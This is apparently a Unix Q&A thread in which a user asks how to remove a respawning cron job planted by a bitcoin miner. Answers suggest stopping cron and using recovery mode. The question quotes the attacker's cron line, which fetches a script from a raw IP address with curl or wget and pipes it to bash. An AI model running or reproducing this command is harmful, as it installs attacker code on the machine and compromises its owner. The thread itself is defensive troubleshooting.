# How to delete rogue cron job

Tags: linux, cron

Hello everyone,
               My machine has been hijacked by a bitcoin miner. he has a cron job that runs every 2 seconds. Using crontab -e to delete it doesn't work because it respawns soon after. I can't edit it with either nano or vi editor because each time I try he has some code running that kills the either editor as soon as I open them. Below is his cron job:

```
*/30 * * * *    (curl -s http://192.210.175.103/mr.sh||wget -q -O - http://192.210.175.103/mr.sh)|bash -sh
```

The job is being run from /tmp but the originating file keeps changing. Please any ideas on how to fix this? Thanks

Comment: My answer here is relevant to your situation: [Process with weird random name consuming significant network and CPU resources. Is someone hacking me?](//unix.stackexchange.com/q/428721)

Answer (score 0):

You could disconnect from the internet, stop cron

```
sudo /etc/init.d/crond stop
```

and then edit the cronjob.

Comment: This is not enough. You don't know what else the intruder has done on the system.

Comment: Next you could download that script (http://192.210.175.103/mr.sh) and undo everything that is done by it.

Answer (score 0):

This is hard to answer precisely without more knowledge of the offending script, but a general tip is to reboot your system into single-user mode or recovery mode, which disables most daemons and gives you a root prompt to resolve the issues.

[This wiki entry](https://wiki.ubuntu.com/RecoveryMode) from Ubuntu explains the procedure in Ubuntu. For your problem, the most attractive feature of recovery mode is that it mounts the filesystem read-only. That means you will be able to search for the offending code before it is able to propagate and hide anywhere. When you have found the problem, remount in read-write mode and purge it from the system.

Comment: How would you know that the cronjob is the only thing modified on the system?

Comment: Of course, you won't. But I interpreted the original question to imply that the miner script has not escalated privileges – it just runs a script *as* the user, in the user's crontab. If so, this procedure would work. Obviously, there might also be other kinds of infections going on. Either way it's advisable to begin the troubleshooting with removing the known offender, and see if that fixes it.